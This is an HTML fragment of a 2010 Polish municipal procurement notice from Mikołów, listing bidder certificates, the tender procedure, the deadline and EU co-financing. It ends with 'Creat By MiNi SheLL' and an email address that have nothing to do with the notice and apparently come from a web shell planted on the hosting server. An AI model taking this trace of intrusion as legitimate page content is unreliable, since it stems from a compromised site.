<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Mikołów, Rynek 16, 43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2010 godzina 11:00, miejsce: Urząd Miasta Mikołów, Rynek 16, 43-190 Mikołów, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, Priorytet V. Środowisko, Działanie 5.5 Dziedzictwo przyrodnicze..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com